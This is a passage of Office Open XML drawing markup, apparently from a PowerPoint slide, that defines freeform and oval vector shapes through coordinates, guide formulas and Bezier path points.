                  <a:gd name="T5" fmla="*/ 1 h 8"/>
                  <a:gd name="T6" fmla="*/ 5 w 7"/>
                  <a:gd name="T7" fmla="*/ 3 h 8"/>
                  <a:gd name="T8" fmla="*/ 5 w 7"/>
                  <a:gd name="T9" fmla="*/ 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8"/>
                  <a:gd name="T17" fmla="*/ 7 w 7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8">
                    <a:moveTo>
                      <a:pt x="5" y="7"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="8"/>
                      <a:pt x="3" y="7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3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="7" y="6"/>
                      <a:pt x="5" y="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8" name="Freeform 1876"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8262" y="-472"/>
                <a:ext cx="47" cy="104"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 20"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 0 w 20"/>
                  <a:gd name="T3" fmla="*/ 41 h 44"/>
                  <a:gd name="T4" fmla="*/ 10 w 20"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 20 w 20"/>
                  <a:gd name="T7" fmla="*/ 41 h 44"/>
                  <a:gd name="T8" fmla="*/ 20 w 20"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 20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44"/>
                  <a:gd name="T20" fmla="*/ 20 w 20"/>
                  <a:gd name="T21" fmla="*/ 44 h 4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44">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="43"/>
                      <a:pt x="4" y="44"/>
                      <a:pt x="10" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="44"/>
                      <a:pt x="20" y="43"/>
                      <a:pt x="20" y="41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9" name="Oval 1877"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8262" y="-479"/>
                <a:ext cx="47" cy="14"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:pr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0" name="Freeform 1878"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8250" y="-571"/>
                <a:ext cx="69" cy="118"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 29"/>
                  <a:gd name="T1" fmla="*/ 0 h 50"/>
                  <a:gd name="T2" fmla="*/ 0 w 29"/>
                  <a:gd name="T3" fmla="*/ 46 h 50"/>
                  <a:gd name="T4" fmla="*/ 15 w 29"/>
                  <a:gd name="T5" fmla="*/ 50 h 50"/>
                  <a:gd name="T6" fmla="*/ 29 w 29"/>
                  <a:gd name="T7" fmla="*/ 46 h 50"/>
                  <a:gd name="T8" fmla="*/ 29 w 29"/>
                  <a:gd name="T9" fmla="*/ 0 h 50"/>
                  <a:gd name="T10" fmla="*/ 0 w 29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9"/>
                  <a:gd name="T19" fmla="*/ 0 h 50"/>
                  <a:gd name="T20" fmla="*/ 29 w 29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9" h="50">
                    <a:moveTo>
                      <a:pt x="0" y="0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0" y="48"/>
                      <a:pt x="7" y="50"/>
                      <a:pt x="15" y="50"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="50"/>
                      <a:pt x="29" y="48"/>
                      <a:pt x="29" y="46"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="29" y="0"/>
                      <a:pt x="29" y="0"/>
                      <a:pt x="2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1" name="Freeform 1879"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8234" y="-611"/>
                <a:ext cx="103" cy="103"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 44"/>
                  <a:gd name="T1" fmla="*/ 0 h 44"/>
                  <a:gd name="T2" fmla="*/ 0 w 44"/>
                  <a:gd name="T3" fmla="*/ 38 h 44"/>
                  <a:gd name="T4" fmla="*/ 22 w 44"/>
                  <a:gd name="T5" fmla="*/ 44 h 44"/>
                  <a:gd name="T6" fmla="*/ 44 w 44"/>
                  <a:gd name="T7" fmla="*/ 38 h 44"/>
                  <a:gd name="T8" fmla="*/ 44 w 44"/>
                  <a:gd name="T9" fmla="*/ 0 h 44"/>
                  <a:gd name="T10" fmla="*/ 0 w 44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"/>
                  <a:gd name="T19" fmla="*/ 0 h 44"/>
                  <a:gd name="T20" fmla="*/ 44 w 44"/>
                  <a:gd name="T21" fmla="*/ 44 h 4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" h="44">
                    <a:moveTo>
                      <a:pt x="0" y="0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41"/>
                      <a:pt x="10" y="44"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="44"/>
                      <a:pt x="44" y="41"/>
                      <a:pt x="44" y="38"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="0"/>
                      <a:pt x="44" y="0"/>
                      <a:pt x="4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2" name="Freeform 1880"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8179" y="-432"/>
                <a:ext cx="158" cy="175"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 54 w 67"/>
                  <a:gd name="T1" fmla="*/ 22 h 74"/>
                  <a:gd name="T2" fmla="*/ 15 w 67"/>
                  <a:gd name="T3" fmla="*/ 5 h 74"/>
                  <a:gd name="T4" fmla="*/ 15 w 67"/>
                  <a:gd name="T5" fmla="*/ 5 h 74"/>
                  <a:gd name="T6" fmla="*/ 4 w 67"/>
                  <a:gd name="T7" fmla="*/ 8 h 74"/>
                  <a:gd name="T8" fmla="*/ 6 w 67"/>
                  <a:gd name="T9" fmla="*/ 12 h 74"/>
                  <a:gd name="T10" fmla="*/ 13 w 67"/>
                  <a:gd name="T11" fmla="*/ 53 h 74"/>
                  <a:gd name="T12" fmla="*/ 32 w 67"/>
                  <a:gd name="T13" fmla="*/ 68 h 74"/>
                  <a:gd name="T14" fmla="*/ 35 w 67"/>
                  <a:gd name="T15" fmla="*/ 74 h 74"/>
                  <a:gd name="T16" fmla="*/ 49 w 67"/>
                  <a:gd name="T17" fmla="*/ 70 h 74"/>
                  <a:gd name="T18" fmla="*/ 49 w 67"/>
                  <a:gd name="T19" fmla="*/ 70 h 74"/>
                  <a:gd name="T20" fmla="*/ 56 w 67"/>
                  <a:gd name="T21" fmla="*/ 67 h 74"/>
                  <a:gd name="T22" fmla="*/ 54 w 67"/>
                  <a:gd name="T23" fmla="*/ 22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7"/>
                  <a:gd name="T37" fmla="*/ 0 h 74"/>
                  <a:gd name="T38" fmla="*/ 67 w 67"/>
                  <a:gd name="T39" fmla="*/ 74 h 7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7" h="74">
                    <a:moveTo>
                      <a:pt x="54" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="7"/>
                      <a:pt x="26" y="0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0" y="22"/>
                      <a:pt x="3" y="39"/>
                      <a:pt x="13" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="60"/>
                      <a:pt x="25" y="65"/>
                      <a:pt x="32" y="68"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="35" y="74"/>
                      <a:pt x="35" y="74"/>
                      <a:pt x="35" y="74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2" y="70"/>
                      <a:pt x="54" y="68"/>
                      <a:pt x="56" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="58"/>
                      <a:pt x="66" y="38"/>
                      <a:pt x="54" y="22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3" name="Freeform 1881"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8144" y="-427"/>
                <a:ext cx="160" cy="182"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 57 w 68"/>
                  <a:gd name="T1" fmla="*/ 69 h 77"/>
                  <a:gd name="T2" fmla="*/ 14 w 68"/>
                  <a:gd name="T3" fmla="*/ 54 h 77"/>
                  <a:gd name="T4" fmla="*/ 12 w 68"/>
                  <a:gd name="T5" fmla="*/ 9 h 77"/>
                  <a:gd name="T6" fmla="*/ 55 w 68"/>
                  <a:gd name="T7" fmla="*/ 23 h 77"/>
                  <a:gd name="T8" fmla="*/ 57 w 68"/>
                  <a:gd name="T9" fmla="*/ 69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"/>
                  <a:gd name="T16" fmla="*/ 0 h 77"/>
                  <a:gd name="T17" fmla="*/ 68 w 68"/>
                  <a:gd name="T18" fmla="*/ 77 h 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" h="77">
                    <a:moveTo>
                      <a:pt x="57" y="69"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="46" y="77"/>
                      <a:pt x="26" y="71"/>
                      <a:pt x="14" y="54"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="38"/>
                      <a:pt x="0" y="18"/>
                      <a:pt x="12" y="9"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="0"/>
                      <a:pt x="42" y="7"/>
                      <a:pt x="55" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="40"/>
                      <a:pt x="68" y="60"/>
                      <a:pt x="57" y="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4" name="Freeform 1882"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8203" y="-361"/>
                <a:ext cx="42" cy="50"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 15 w 18"/>
                  <a:gd name="T1" fmla="*/ 19 h 21"/>
                  <a:gd name="T2" fmla="*/ 4 w 18"/>
                  <a:gd name="T3" fmla="*/ 15 h 21"/>
                  <a:gd name="T4" fmla="*/ 3 w 18"/>
                  <a:gd name="T5" fmla="*/ 3 h 21"/>
                  <a:gd name="T6" fmla="*/ 15 w 18"/>
                  <a:gd name="T7" fmla="*/ 7 h 21"/>
                  <a:gd name="T8" fmla="*/ 15 w 18"/>
                  <a:gd name="T9" fmla="*/ 1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21"/>
                  <a:gd name="T17" fmla="*/ 18 w 18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21">
                    <a:moveTo>
                      <a:pt x="15" y="19"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="12" y="21"/>
                      <a:pt x="7" y="20"/>
                      <a:pt x="4" y="15"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="0" y="11"/>
                      <a:pt x="0" y="5"/>
                      <a:pt x="3" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="0"/>
                      <a:pt x="11" y="2"/>
                      <a:pt x="15" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="11"/>
                      <a:pt x="18" y="17"/>
                      <a:pt x="15" y="1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5" name="Freeform 1883"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8217" y="-345"/>
                <a:ext cx="14" cy="17"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 5 w 6"/>
                  <a:gd name="T1" fmla="*/ 7 h 7"/>
                  <a:gd name="T2" fmla="*/ 1 w 6"/>
                  <a:gd name="T3" fmla="*/ 5 h 7"/>
                  <a:gd name="T4" fmla="*/ 1 w 6"/>
                  <a:gd name="T5" fmla="*/ 1 h 7"/>
                  <a:gd name="T6" fmla="*/ 5 w 6"/>
                  <a:gd name="T7" fmla="*/ 2 h 7"/>
                  <a:gd name="T8" fmla="*/ 5 w 6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7"/>
                  <a:gd name="T17" fmla="*/ 6 w 6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7">
                    <a:moveTo>
                      <a:pt x="5" y="7"/>
                    </a:move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2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="6" y="4"/>
                      <a:pt x="6" y="6"/>
                      <a:pt x="5" y="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6" name="Freeform 1884"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="7775" y="-2189"/>
                <a:ext cx="936" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 77 w 396"/>
                  <a:gd name="T1" fmla="*/ 12 h 232"/>
                  <a:gd name="T2" fmla="*/ 77 w 396"/>
                  <a:gd name="T3" fmla="*/ 12 h 232"/>
                  <a:gd name="T4" fmla="*/ 23 w 396"/>
                  <a:gd name="T5" fmla="*/ 44 h 232"/>
                  <a:gd name="T6" fmla="*/ 11 w 396"/>
                  <a:gd name="T7" fmla="*/ 114 h 232"/>
                  <a:gd name="T8" fmla="*/ 11 w 396"/>
                  <a:gd name="T9" fmla="*/ 114 h 232"/>
                  <a:gd name="T10" fmla="*/ 11 w 396"/>
                  <a:gd name="T11" fmla="*/ 115 h 232"/>
                  <a:gd name="T12" fmla="*/ 16 w 396"/>
                  <a:gd name="T13" fmla="*/ 120 h 232"/>
                  <a:gd name="T14" fmla="*/ 298 w 396"/>
                  <a:gd name="T15" fmla="*/ 232 h 232"/>
                  <a:gd name="T16" fmla="*/ 396 w 396"/>
                  <a:gd name="T17" fmla="*/ 78 h 232"/>
                  <a:gd name="T18" fmla="*/ 77 w 396"/>
                  <a:gd name="T19" fmla="*/ 12 h 2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6"/>
                  <a:gd name="T31" fmla="*/ 0 h 232"/>
                  <a:gd name="T32" fmla="*/ 396 w 396"/>
                  <a:gd name="T33" fmla="*/ 232 h 23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6" h="232">
                    <a:moveTo>
                      <a:pt x="77" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="77" y="12"/>
                      <a:pt x="77" y="12"/>
                      <a:pt x="77" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="59" y="12"/>
                      <a:pt x="38" y="24"/>
                      <a:pt x="23" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="68"/>
                      <a:pt x="0" y="97"/>
                      <a:pt x="11" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="114"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="114"/>
                      <a:pt x="11" y="115"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="13" y="117"/>
                      <a:pt x="14" y="118"/>
                      <a:pt x="16" y="120"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="34" y="140"/>
                      <a:pt x="106" y="209"/>
                      <a:pt x="298" y="232"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="78"/>
                      <a:pt x="396" y="78"/>
                      <a:pt x="396" y="78"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="396" y="78"/>
                      <a:pt x="278" y="0"/>
                      <a:pt x="77" y="1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7" name="Freeform 1885"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="8373" y="-2059"/>
                <a:ext cx="397" cy="448"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 141 w 168"/>
                  <a:gd name="T1" fmla="*/ 21 h 190"/>
                  <a:gd name="T2" fmla="*/ 34 w 168"/>
                  <a:gd name="T3" fmla="*/ 57 h 190"/>
                  <a:gd name="T4" fmla="*/ 28 w 168"/>
                  <a:gd name="T5" fmla="*/ 169 h 190"/>
                  <a:gd name="T6" fmla="*/ 135 w 168"/>
                  <a:gd name="T7" fmla="*/ 133 h 190"/>
                  <a:gd name="T8" fmla="*/ 141 w 168"/>
                  <a:gd name="T9" fmla="*/ 21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8"/>
                  <a:gd name="T16" fmla="*/ 0 h 190"/>
                  <a:gd name="T17" fmla="*/ 168 w 168"/>
                  <a:gd name="T18" fmla="*/ 190 h 1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8" h="190">
                    <a:moveTo>
                      <a:pt x="141" y="21"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="113" y="0"/>
                      <a:pt x="65" y="16"/>
                      <a:pt x="34" y="57"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="3" y="98"/>
                      <a:pt x="0" y="148"/>
                      <a:pt x="28" y="169"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="56" y="190"/>
                      <a:pt x="104" y="174"/>
                      <a:pt x="135" y="133"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="166" y="93"/>
                      <a:pt x="168" y="42"/>
                      <a:pt x="141" y="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8" name="Freeform 1886"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3568" y="-3477"/>
                <a:ext cx="1673" cy="851"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 770 w 1673"/>
                  <a:gd name="T1" fmla="*/ 851 h 851"/>
                  <a:gd name="T2" fmla="*/ 1673 w 1673"/>
                  <a:gd name="T3" fmla="*/ 50 h 851"/>
                  <a:gd name="T4" fmla="*/ 1486 w 1673"/>
                  <a:gd name="T5" fmla="*/ 0 h 851"/>
                  <a:gd name="T6" fmla="*/ 0 w 1673"/>
                  <a:gd name="T7" fmla="*/ 640 h 851"/>
                  <a:gd name="T8" fmla="*/ 770 w 1673"/>
                  <a:gd name="T9" fmla="*/ 851 h 8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73"/>
                  <a:gd name="T16" fmla="*/ 0 h 851"/>
                  <a:gd name="T17" fmla="*/ 1673 w 1673"/>
                  <a:gd name="T18" fmla="*/ 851 h 8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73" h="851">
                    <a:moveTo>
                      <a:pt x="770" y="851"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1673" y="50"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1486" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="640"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="770" y="85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9" name="Freeform 1887"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="6462" y="-2988"/>
                <a:ext cx="2842" cy="1441"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 2842"/>
                  <a:gd name="T1" fmla="*/ 1035 h 1441"/>
                  <a:gd name="T2" fmla="*/ 1495 w 2842"/>
                  <a:gd name="T3" fmla="*/ 1441 h 1441"/>
                  <a:gd name="T4" fmla="*/ 2842 w 2842"/>
                  <a:gd name="T5" fmla="*/ 95 h 1441"/>
                  <a:gd name="T6" fmla="*/ 2492 w 2842"/>
                  <a:gd name="T7" fmla="*/ 0 h 1441"/>
                  <a:gd name="T8" fmla="*/ 1117 w 2842"/>
                  <a:gd name="T9" fmla="*/ 617 h 1441"/>
                  <a:gd name="T10" fmla="*/ 0 w 2842"/>
                  <a:gd name="T11" fmla="*/ 1035 h 14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842"/>
                  <a:gd name="T19" fmla="*/ 0 h 1441"/>
                  <a:gd name="T20" fmla="*/ 2842 w 2842"/>
                  <a:gd name="T21" fmla="*/ 1441 h 144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842" h="1441">
                    <a:moveTo>
                      <a:pt x="0" y="1035"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="1495" y="1441"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2842" y="95"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="2492" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="1117" y="617"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="10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0" name="Freeform 1888"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2971" y="-3002"/>
                <a:ext cx="6888" cy="2532"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 2783 w 2916"/>
                  <a:gd name="T1" fmla="*/ 691 h 1072"/>
                  <a:gd name="T2" fmla="*/ 2616 w 2916"/>
                  <a:gd name="T3" fmla="*/ 576 h 1072"/>
                  <a:gd name="T4" fmla="*/ 2088 w 2916"/>
                  <a:gd name="T5" fmla="*/ 533 h 1072"/>
                  <a:gd name="T6" fmla="*/ 97 w 2916"/>
                  <a:gd name="T7" fmla="*/ 5 h 1072"/>
                  <a:gd name="T8" fmla="*/ 91 w 2916"/>
                  <a:gd name="T9" fmla="*/ 3 h 1072"/>
                  <a:gd name="T10" fmla="*/ 90 w 2916"/>
                  <a:gd name="T11" fmla="*/ 3 h 1072"/>
                  <a:gd name="T12" fmla="*/ 90 w 2916"/>
                  <a:gd name="T13" fmla="*/ 3 h 1072"/>
                  <a:gd name="T14" fmla="*/ 25 w 2916"/>
                  <a:gd name="T15" fmla="*/ 37 h 1072"/>
                  <a:gd name="T16" fmla="*/ 14 w 2916"/>
                  <a:gd name="T17" fmla="*/ 115 h 1072"/>
                  <a:gd name="T18" fmla="*/ 14 w 2916"/>
                  <a:gd name="T19" fmla="*/ 115 h 1072"/>
                  <a:gd name="T20" fmla="*/ 14 w 2916"/>
                  <a:gd name="T21" fmla="*/ 115 h 1072"/>
                  <a:gd name="T22" fmla="*/ 20 w 2916"/>
                  <a:gd name="T23" fmla="*/ 121 h 1072"/>
                  <a:gd name="T24" fmla="*/ 27 w 2916"/>
                  <a:gd name="T25" fmla="*/ 125 h 1072"/>
                  <a:gd name="T26" fmla="*/ 908 w 2916"/>
                  <a:gd name="T27" fmla="*/ 690 h 1072"/>
                  <a:gd name="T28" fmla="*/ 1957 w 2916"/>
                  <a:gd name="T29" fmla="*/ 972 h 1072"/>
                  <a:gd name="T30" fmla="*/ 2908 w 2916"/>
                  <a:gd name="T31" fmla="*/ 898 h 1072"/>
                  <a:gd name="T32" fmla="*/ 2783 w 2916"/>
                  <a:gd name="T33" fmla="*/ 691 h 10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916"/>
                  <a:gd name="T52" fmla="*/ 0 h 1072"/>
                  <a:gd name="T53" fmla="*/ 2916 w 2916"/>
                  <a:gd name="T54" fmla="*/ 1072 h 107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916" h="1072">
                    <a:moveTo>
                      <a:pt x="2783" y="691"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="2728" y="637"/>
                      <a:pt x="2719" y="606"/>
                      <a:pt x="2616" y="576"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2482" y="537"/>
                      <a:pt x="2154" y="542"/>
                      <a:pt x="2088" y="533"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1935" y="512"/>
                      <a:pt x="222" y="40"/>
                      <a:pt x="97" y="5"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="95" y="4"/>
                      <a:pt x="93" y="4"/>
                      <a:pt x="91" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                      <a:pt x="90" y="3"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="69" y="0"/>
                      <a:pt x="43" y="12"/>
                      <a:pt x="25" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="64"/>
                      <a:pt x="0" y="97"/>
                      <a:pt x="14" y="115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6" y="117"/>
                      <a:pt x="18" y="120"/>
                      <a:pt x="20" y="121"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="23" y="123"/>
                      <a:pt x="25" y="124"/>
                      <a:pt x="27" y="125"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="121" y="198"/>
                      <a:pt x="682" y="629"/>
                      <a:pt x="908" y="690"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="1156" y="757"/>
                      <a:pt x="1957" y="972"/>
                      <a:pt x="1957" y="972"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2333" y="1072"/>
                      <a:pt x="2866" y="1052"/>
                      <a:pt x="2908" y="898"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="2916" y="868"/>
                      <a:pt x="2909" y="812"/>
                      <a:pt x="2783" y="69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1" name="Freeform 1889"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="9244" y="-1485"/>
                <a:ext cx="223" cy="125"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 1 w 94"/>
                  <a:gd name="T1" fmla="*/ 22 h 53"/>
                  <a:gd name="T2" fmla="*/ 77 w 94"/>
                  <a:gd name="T3" fmla="*/ 0 h 53"/>
                  <a:gd name="T4" fmla="*/ 94 w 94"/>
                  <a:gd name="T5" fmla="*/ 17 h 53"/>
                  <a:gd name="T6" fmla="*/ 0 w 94"/>
                  <a:gd name="T7" fmla="*/ 53 h 53"/>
                  <a:gd name="T8" fmla="*/ 1 w 94"/>
                  <a:gd name="T9" fmla="*/ 22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4"/>
                  <a:gd name="T16" fmla="*/ 0 h 53"/>
                  <a:gd name="T17" fmla="*/ 94 w 94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4" h="53">
                    <a:moveTo>
                      <a:pt x="1" y="22"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="1" y="22"/>
                      <a:pt x="56" y="20"/>
                      <a:pt x="77" y="0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4" y="17"/>
                      <a:pt x="58" y="53"/>
                      <a:pt x="0" y="53"/>
                    </a:cubicBezTo>
                    <a:lnTo>
                      <a:pt x="1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2" name="Freeform 1890"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="3951" y="-1202"/>
                <a:ext cx="933" cy="548"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 76 w 395"/>
                  <a:gd name="T1" fmla="*/ 12 h 232"/>
                  <a:gd name="T2" fmla="*/ 76 w 395"/>
                  <a:gd name="T3" fmla="*/ 12 h 232"/>
                  <a:gd name="T4" fmla="*/ 22 w 395"/>
                  <a:gd name="T5" fmla="*/ 44 h 232"/>
                  <a:gd name="T6" fmla="*/ 10 w 395"/>
                  <a:gd name="T7" fmla="*/ 114 h 232"/>
                  <a:gd name="T8" fmla="*/ 10 w 395"/>
                  <a:gd name="T9" fmla="*/ 114 h 232"/>
                  <a:gd name="T10" fmla="*/ 11 w 395"/>
                  <a:gd name="T11" fmla="*/ 115 h 232"/>
                  <a:gd name="T12" fmla="*/ 15 w 395"/>
                  <a:gd name="T13" fmla="*/ 120 h 232"/>
                  <a:gd name="T14" fmla="*/ 297 w 395"/>
                  <a:gd name="T15" fmla="*/ 232 h 232"/>
                  <a:gd name="T16" fmla="*/ 395 w 395"/>
                  <a:gd name="T17" fmla="*/ 78 h 232"/>
                  <a:gd name="T18" fmla="*/ 76 w 395"/>
                  <a:gd name="T19" fmla="*/ 12 h 2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5"/>
                  <a:gd name="T31" fmla="*/ 0 h 232"/>
                  <a:gd name="T32" fmla="*/ 395 w 395"/>
                  <a:gd name="T33" fmla="*/ 232 h 23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5" h="232">
                    <a:moveTo>
                      <a:pt x="76" y="12"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="76" y="12"/>
                      <a:pt x="76" y="12"/>
                      <a:pt x="76" y="12"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="58" y="12"/>
                      <a:pt x="37" y="24"/>
                      <a:pt x="22" y="44"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="4" y="68"/>
                      <a:pt x="0" y="97"/>
